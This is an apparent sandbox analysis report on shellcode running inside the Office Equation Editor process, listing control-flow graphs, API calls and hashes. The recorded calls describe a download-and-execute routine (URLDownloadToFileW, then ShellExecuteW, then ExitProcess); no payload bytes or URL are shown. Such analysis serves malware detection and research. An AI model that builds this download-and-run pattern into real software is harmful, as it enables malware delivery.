                                                  control_flow_graph 130 35f0435-35f0437 URLDownloadToFileW 131 35f043e-35f045b call 35f0463 130->131 132 35f0439 call 35f044e 130->132 136 35f045d-35f047f ShellExecuteW call 35f0488 131->136 137 35f04c2-35f04ce 131->137 132->131 138 35f04d1 136->138 149 35f0481 136->149 137->138 140 35f04d9-35f04dd 138->140 141 35f04d3-35f04d7 138->141 144 35f04df-35f04e3 140->144 145 35f04f2-35f04f4 140->145 141->140 143 35f04e5-35f04ec 141->143 147 35f04ee 143->147 148 35f04f0 143->148 144->143 144->145 150 35f0504-35f0505 145->150 147->145 148->145 151 35f04f6-35f04ff 148->151 149->145 152 35f0483-35f048d ExitProcess 149->152 155 35f04c8-35f04cb 151->155 156 35f0501 151->156 155->151 158 35f04cd 155->158 156->150 158->138
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(00000000,035F03EB,?,00000000,00000000), ref: 035F0437
                                                    • Part of subcall function 035F044E: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F0475
                                                    • Part of subcall function 035F044E: ExitProcess.KERNEL32(00000000), ref: 035F048D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                  • String ID:
                                                  • API String ID: 3584569557-0
                                                  • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                  • Instruction ID: 8270f14f42b0e48e9c825fd04af8965b7f11a048a3a0f97d829c180a4676a1f3
                                                  • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                  • Instruction Fuzzy Hash: B2F0E26468CB412DEA51E7746C8EF6A6E64BF91604F1C4889B3464F4F3E5908400862A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 159 35f0463-35f0475 ShellExecuteW 161 35f047c-35f047f 159->161 162 35f0477 call 35f0488 159->162 164 35f04d1 161->164 165 35f0481 161->165 162->161 166 35f04d9-35f04dd 164->166 167 35f04d3-35f04d7 164->167 168 35f0483-35f048d ExitProcess 165->168 169 35f04f2-35f04f4 165->169 166->169 171 35f04df-35f04e3 166->171 167->166 170 35f04e5-35f04ec 167->170 173 35f0504-35f0505 169->173 174 35f04ee 170->174 175 35f04f0 170->175 171->169 171->170 174->169 175->169 177 35f04f6-35f04ff 175->177 179 35f04c8-35f04cb 177->179 180 35f0501 177->180 179->177 181 35f04cd 179->181 180->173 181->164
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F0475
                                                    • Part of subcall function 035F0488: ExitProcess.KERNEL32(00000000), ref: 035F048D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExecuteExitProcessShell
                                                  • String ID:
                                                  • API String ID: 1124553745-0
                                                  • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                  • Instruction ID: eaff0c484929867a2ea487090315282707c1ed768580a9109bb0d6fcfb6631b9
                                                  • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                  • Instruction Fuzzy Hash: 09014E945847132CDB30F628AC1DFBBAB50BB51711FCC8C47AB91070F7D19480C38629
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 182 35f044e-35f0450 184 35f0455-35f045b 182->184 185 35f0450 call 35f0463 182->185 186 35f045d-35f047f ShellExecuteW call 35f0488 184->186 187 35f04c2-35f04ce 184->187 185->184 188 35f04d1 186->188 199 35f0481 186->199 187->188 190 35f04d9-35f04dd 188->190 191 35f04d3-35f04d7 188->191 194 35f04df-35f04e3 190->194 195 35f04f2-35f04f4 190->195 191->190 193 35f04e5-35f04ec 191->193 197 35f04ee 193->197 198 35f04f0 193->198 194->193 194->195 200 35f0504-35f0505 195->200 197->195 198->195 201 35f04f6-35f04ff 198->201 199->195 202 35f0483-35f048d ExitProcess 199->202 205 35f04c8-35f04cb 201->205 206 35f0501 201->206 205->201 208 35f04cd 205->208 206->200 208->188
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExecuteExitProcessShell
                                                  • String ID:
                                                  • API String ID: 1124553745-0
                                                  • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                  • Instruction ID: f687842ab74e85d19ff32ee953fc9dd8845255b2481193b9d7a9e7057fad570b
                                                  • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                  • Instruction Fuzzy Hash: 7B014920688B023CE770E3286C8CFAEAA90BB91715F9C885AE7514B0F7D28484438629
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 209 35f0488-35f048d ExitProcess
                                                  APIs
                                                  • ExitProcess.KERNEL32(00000000), ref: 035F048D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                  • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%